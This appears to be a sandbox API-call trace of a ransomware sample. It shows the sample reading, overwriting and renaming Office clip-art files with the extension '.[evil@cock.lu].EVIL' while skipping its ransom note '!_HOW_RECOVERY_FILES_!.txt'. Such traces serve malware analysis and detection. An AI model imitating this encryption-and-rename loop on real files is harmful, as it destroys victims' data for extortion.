0x1 [0162.835] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00668_.WMF", dwFileAttributes=0x200) returned 0 [0162.835] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.835] wcsstr (_Str="PE00685_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.835] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00685_.WMF") returned 69 [0162.835] wcscmp (_String1="PE00685_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.835] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00685_.WMF") returned 0x0 [0162.835] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00685_.WMF") returned 0x45 [0162.835] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00685_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00685_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.837] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x108a, lpOverlapped=0x0) returned 1 [0162.839] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.839] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.840] _errno () returned 0x84b1160840 [0162.840] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.840] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x10a0, lpOverlapped=0x0) returned 1 [0162.840] CloseHandle (hObject=0x1a8) returned 1 [0162.840] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00685_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.840] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.840] __uncaught_exception () returned 0x84b1160800 [0162.840] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.840] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00685_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00685_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00685_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00685_.wmf.[evil@cock.lu].evil")) returned 1 [0162.841] ??_V@YAXPEAX@Z () returned 0x1 [0162.844] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00685_.WMF", dwFileAttributes=0x200) returned 0 [0162.844] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.844] wcsstr (_Str="PE00686_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.844] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00686_.WMF") returned 69 [0162.844] wcscmp (_String1="PE00686_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.844] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00686_.WMF") returned 0x0 [0162.844] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00686_.WMF") returned 0x45 [0162.844] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00686_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00686_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.846] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x112e, lpOverlapped=0x0) returned 1 [0162.870] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.870] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.870] _errno () returned 0x84b1160840 [0162.870] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.870] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1140, lpOverlapped=0x0) returned 1 [0162.870] CloseHandle (hObject=0x1a8) returned 1 [0162.871] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00686_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.871] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.871] __uncaught_exception () returned 0x84b1160800 [0162.871] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.871] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00686_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00686_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00686_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00686_.wmf.[evil@cock.lu].evil")) returned 1 [0162.872] ??_V@YAXPEAX@Z () returned 0x1 [0162.875] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00686_.WMF", dwFileAttributes=0x200) returned 0 [0162.875] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.875] wcsstr (_Str="PE00693_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.875] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00693_.WMF") returned 69 [0162.875] wcscmp (_String1="PE00693_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.875] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00693_.WMF") returned 0x0 [0162.875] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00693_.WMF") returned 0x45 [0162.875] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00693_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00693_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.877] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1138, lpOverlapped=0x0) returned 1 [0162.879] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.879] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.879] _errno () returned 0x84b1160840 [0162.879] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.879] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1140, lpOverlapped=0x0) returned 1 [0162.879] CloseHandle (hObject=0x1a8) returned 1 [0162.879] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00693_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.880] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.880] __uncaught_exception () returned 0x84b1160800 [0162.880] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.880] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00693_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00693_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00693_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00693_.wmf.[evil@cock.lu].evil")) returned 1 [0162.881] ??_V@YAXPEAX@Z () returned 0x1 [0162.884] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00693_.WMF", dwFileAttributes=0x200) returned 0 [0162.884] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.884] wcsstr (_Str="PE00720_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.884] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00720_.WMF") returned 69 [0162.884] wcscmp (_String1="PE00720_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.884] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00720_.WMF") returned 0x0 [0162.884] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00720_.WMF") returned 0x45 [0162.884] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00720_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00720_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.887] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3926, lpOverlapped=0x0) returned 1 [0162.919] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.919] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.919] _errno () returned 0x84b1160840 [0162.919] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.919] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3940, lpOverlapped=0x0) returned 1 [0162.919] CloseHandle (hObject=0x1a8) returned 1 [0162.919] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00720_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.919] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.919] __uncaught_exception () returned 0x84b1160800 [0162.919] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.920] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00720_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00720_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00720_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00720_.wmf.[evil@cock.lu].evil")) returned 1 [0162.921] ??_V@YAXPEAX@Z () returned 0x1 [0162.923] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00720_.WMF", dwFileAttributes=0x200) returned 0 [0162.923] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.923] wcsstr (_Str="PE00723_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.923] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00723_.WMF") returned 69 [0162.923] wcscmp (_String1="PE00723_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.923] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00723_.WMF") returned 0x0 [0162.923] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00723_.WMF") returned 0x45 [0162.923] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00723_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00723_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.925] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1afc, lpOverlapped=0x0) returned 1 [0162.961] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.961] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0162.961] _errno () returned 0x84b1160840 [0162.961] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0162.961] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1b00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b00, lpOverlapped=0x0) returned 1 [0162.961] CloseHandle (hObject=0x1a8) returned 1 [0162.961] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00723_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0162.961] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0162.961] __uncaught_exception () returned 0x84b1160800 [0162.961] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0162.962] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00723_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00723_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00723_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00723_.wmf.[evil@cock.lu].evil")) returned 1 [0162.962] ??_V@YAXPEAX@Z () returned 0x1 [0162.965] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00723_.WMF", dwFileAttributes=0x200) returned 0 [0162.965] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0162.965] wcsstr (_Str="PE00726_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0162.965] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00726_.WMF") returned 69 [0162.965] wcscmp (_String1="PE00726_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0162.965] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00726_.WMF") returned 0x0 [0162.965] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00726_.WMF") returned 0x45 [0162.965] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00726_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00726_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0162.968] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb1a4, lpOverlapped=0x0) returned 1 [0163.020] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.020] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.020] _errno () returned 0x84b1160840 [0163.020] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.020] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xb1c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb1c0, lpOverlapped=0x0) returned 1 [0163.020] CloseHandle (hObject=0x1a8) returned 1 [0163.020] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00726_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0163.021] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0163.021] __uncaught_exception () returned 0x84b1160800 [0163.021] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0163.021] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00726_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00726_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00726_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00726_.wmf.[evil@cock.lu].evil")) returned 1 [0163.022] ??_V@YAXPEAX@Z () returned 0x1 [0163.025] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00726_.WMF", dwFileAttributes=0x200) returned 0 [0163.025] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0163.025] wcsstr (_Str="PE00737_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0163.025] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00737_.WMF") returned 69 [0163.025] wcscmp (_String1="PE00737_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0163.025] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00737_.WMF") returned 0x0 [0163.025] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00737_.WMF") returned 0x45 [0163.025] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00737_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00737_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0163.027] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9e2c, lpOverlapped=0x0) returned 1 [0163.060] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.060] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.060] _errno () returned 0x84b1160840 [0163.060] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.060] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x9e40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9e40, lpOverlapped=0x0) returned 1 [0163.062] CloseHandle (hObject=0x1a8) returned 1 [0163.062] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00737_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0163.063] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0163.063] __uncaught_exception () returned 0x84b1160800 [0163.063] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0163.063] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00737_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00737_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00737_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00737_.wmf.[evil@cock.lu].evil")) returned 1 [0163.064] ??_V@YAXPEAX@Z () returned 0x1 [0163.066] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00737_.WMF", dwFileAttributes=0x200) returned 0 [0163.066] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0163.066] wcsstr (_Str="PE00833_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0163.066] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00833_.WMF") returned 69 [0163.067] wcscmp (_String1="PE00833_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0163.067] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00833_.WMF") returned 0x0 [0163.067] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00833_.WMF") returned 0x45 [0163.067] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00833_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00833_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0163.069] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1ca0, lpOverlapped=0x0) returned 1 [0163.119] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.119] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.119] _errno () returned 0x84b1160840 [0163.119] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.119] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x1cc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1cc0, lpOverlapped=0x0) returned 1 [0163.119] CloseHandle (hObject=0x1a8) returned 1 [0163.120] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00833_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0163.120] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0163.120] __uncaught_exception () returned 0x84b1160800 [0163.120] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0163.120] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00833_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00833_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00833_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00833_.wmf.[evil@cock.lu].evil")) returned 1 [0163.121] ??_V@YAXPEAX@Z () returned 0x1 [0163.124] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00833_.WMF", dwFileAttributes=0x200) returned 0 [0163.124] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0163.127] wcsstr (_Str="PE00898_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0163.127] 